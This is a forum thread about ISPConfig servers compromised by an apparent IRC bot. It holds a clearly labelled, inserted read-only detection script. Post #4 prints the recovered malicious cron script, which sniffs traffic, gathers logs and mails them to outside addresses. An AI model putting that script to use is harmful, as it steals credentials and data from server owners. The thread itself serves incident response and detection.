HowtoForge Forums > ISPConfig 3 > General

  #1  
Old 1st March 2010, 23:44
SamTzu
HowtoForge Supporter
Hacked!!!

Posting this quickly so that others can check their systems for signs.
ls -ahl /usr/lib/.x/

If that shows you files on your server, you have been hacked, just like we seem to have been on several servers. (All ISPConfig3 servers.)

Powered by ISPConfig 3.0.1.6

Debian Lenny 5.0.3 (OpenVz) Proxmox 1.4
Linux server44 2.6.24-7-pve #1 SMP PREEMPT Tue Jun 2 08:00:29 CEST 2009 i686


Seems like some kind of IRC Bot.
__________________

Sami Mattila
Internet-Content

Telephone:
00358942833310
Email: firstname.lastname@internet-content.org
Shop: http://shop.internet-content.net
Site: http://www.internet-content.net
Blog: http://www.internet-content.net/en/blog
FB: https://www.facebook.com/internetcontent

  #2  
Old 1st March 2010, 23:58
edge
Moderator

All my Debian Lenny servers (with ISPconfig3) are okay.
Quote:
ls -ahl /usr/lib/.x/
ls: cannot access /usr/lib/.x/: No such file or directory
__________________
Never execute code written on a Friday or a Monday.

  #3  
Old 2nd March 2010, 00:00
SamTzu
HowtoForge Supporter

(Oops, spoke too soon!! Looks like Ubuntu 8.04 LTS / ISPConfig 2's are also vulnerable.)
Also found them in Debian 5.0.3 / ISPConfig 3's so far.

If your server has been used to hack other servers you can see something like this in 'name'.seen file.

server.name.com none 1267130228 2 Quit: I'll get you for this!!!
m1n2b3b3b m1n2b3b3b!~l3iliboi@161.253.129.67 none 1267471837 3 l3iliboi--
l3iliboi`- l3iliboi`-!~l3iliboi@l3iliboi.users.undernet.org none 1267392327 3 l3iliboi
l3iliboi l3iliboi!~l3iliboi@l3iliboi.users.undernet.org none 1267426060 2 Read error: Operation timed out

Also, crontab -e will show your crontab empty except for a command that will call the /usr/lib/.x/update file.
  #4  
Old 2nd March 2010, 01:06
SamTzu
HowtoForge Supporter

The plot thickens.
This was recovered on one of our test servers that has ISPconfig2 on Ubuntu 8.04 LTS.

They used /etc/cron.daily/dnsquery:

#!/bin/sh
cd /usr/lib/
./popauth -r httpd.log >> test
echo "$(uptime)" >> test
rm -rf httpd.log
echo "named.sn"
cat /usr/lib/named/named.sn >> test
rm -rf /usr/lib/named/named.sn
cd /usr/lib/named
./clean
./cleanssh
echo "ssh.log" >> /usr/lib/test
cat ssh.log >> /usr/lib/test
cd /usr/lib/
mail thelinuxpinguin@yahoo.com -s "$(hostname -f)" < test
mail stormuletzz@yahoo.ca -s "$(hostname -f)" < test
A=$PATH
killall -9 popauth
export PATH=/usr/lib/
popauth -w httpd.log &
export PATH=$A
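The indicators the posts above describe (the hidden /usr/lib/.x directory and its update script, the /etc/cron.daily/dnsquery dropper, the popauth binary and the /usr/lib/named helpers, a crontab entry calling into /usr/lib/.x, and the IRC-style .seen file) can be checked read-only with a short script. This is an added example, not code from the thread or from ISPConfig; the path list is taken from the posts, the .seen line pattern is an assumption derived from the sample in post #3, and the file and function names are made up for illustration.

```shell
#!/bin/sh
# Added example (not code from the thread): read-only check for the
# indicators reported in this thread. Paths come from the posts; the
# ".seen" regex is an assumption based on the sample in post #3.
# Usage: sh check_irc_bot.sh --scan [ROOT]
# ROOT defaults to /; pass a mount point to scan an offline image instead.

# Filesystem paths named in the thread, relative to ROOT.
INDICATOR_PATHS="usr/lib/.x usr/lib/.x/update etc/cron.daily/dnsquery usr/lib/popauth usr/lib/named/named.sn usr/lib/named/clean usr/lib/named/cleanssh"

# check_paths ROOT: print each indicator path that exists under ROOT.
# Returns 0 when none exist (clean) and 1 when at least one does.
check_paths() {
  base="${1:-/}"; base="${base%/}"
  hits=0
  for p in $INDICATOR_PATHS; do
    if [ -e "$base/$p" ]; then
      echo "FOUND: $base/$p"
      hits=1
    fi
  done
  return $hits
}

# check_crontab TEXT: scan crontab output (e.g. "$(crontab -l)") for entries
# that run anything out of /usr/lib/.x, the cron hook post #3 describes.
# Returns 0 if clean, 1 if such an entry is present.
check_crontab() {
  matches=$(printf '%s\n' "$1" | grep -n '/usr/lib/\.x' || true)
  if [ -n "$matches" ]; then
    echo "SUSPICIOUS CRON ENTRY: $matches"
    return 1
  fi
  return 0
}

# check_seen FILE: post #3 shows the bot's .seen file recording IRC users as
# "nick nick!~ident@host none <epoch> <n> <reason>". Report lines of that
# shape (regex is an assumption from that sample); return 1 if any exist.
check_seen() {
  [ -f "$1" ] || return 0
  matches=$(grep -E '^[^ ]+ [^ ]+![^ ]+@[^ ]+ ' "$1" || true)
  if [ -n "$matches" ]; then
    echo "IRC .seen RECORDS IN $1:"
    echo "$matches"
    return 1
  fi
  return 0
}

# scan ROOT: run every check; returns 1 if anything was found.
scan() {
  root="${1:-/}"
  status=0
  check_paths "$root" || status=1
  # The posts place the bot under /usr/lib, so look for .seen files there.
  for f in $(find "${root%/}/usr/lib" -name '*.seen' 2>/dev/null); do
    check_seen "$f" || status=1
  done
  # Only the live system has a crontab worth reading.
  if [ "$root" = "/" ] && command -v crontab >/dev/null 2>&1; then
    check_crontab "$(crontab -l 2>/dev/null)" || status=1
  fi
  return $status
}

if [ "${1:-}" = "--scan" ]; then
  scan "${2:-/}"
  exit $?
fi
```

Run it against a mounted image rather than the live root where possible: a compromised host may have a modified ls, find or grep, so a clean result from the live system is only as trustworthy as its binaries. The checks are deliberately limited to the artefacts this thread reports; they do not prove a host is clean, only that these particular traces are absent.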
  #5  
Old 2nd March 2010, 01:35
edge
Moderator

So.. Any fix for this?
  #6  
Old 2nd March 2010, 01:48
edge
Moderator

Looks like an old hack from 2006
See: http://ubuntuforums.org/showthread.php?t=221922
Page 2 will show the exact same code as you posted.
  #7  
Old 2nd March 2010, 02:42
SamTzu
HowtoForge Supporter

That was only one of the hacks on the test server.

The ones that I'm worried about are the ones that were on ns3 and ns5.
Those were minimal Debian / ISPC3 servers.

They only contained LAMP stuff without any clients. Not even FTP.
  #8  
Old 2nd March 2010, 09:27
damir
Senior Member

SamTzu, this is always a bitch, but can you give us some information, like: is this a single server running all the services, or is it a multi-server environment? Was your server patched? Are you using a firewall? Do you allow your customers SSH access? How do you access the server? Have you done any hardening of the server? Have they accessed the server through a website or some exploit?
  #9  
Old 2nd March 2010, 09:38
edge
Moderator

Quote:
Originally Posted by SamTzu View Post
That was only one of the hacks on the test server.

The ones that I'm worried about are the ones that were on ns3 and ns5.
Those were minimal Debian / ISPC3 servers.

They only contained LAMP stuff without any clients. Not even FTP.
Did you also have "Horde web mail" on it as test?
  #10  
Old 2nd March 2010, 09:44
SamTzu
HowtoForge Supporter

Nope.

As I said before...
What I'm really worried about is that 2 of the 7 hacked servers had almost no installed services and no other users.
(No Email or FTP service installed.)

That points the vulnerability (if there is one) to either Debian/Ubuntu LAMP or ISPConfig.

Either way it's not good.
We are still working on whether it was a weak password or a vulnerability.
What's worse is that it looks like a 'script kiddie' type of hack. They were not too clever in covering their tracks.
Missing cron jobs and history are pretty obvious clues.
If this is a vulnerability it means that this vulnerability is easily available.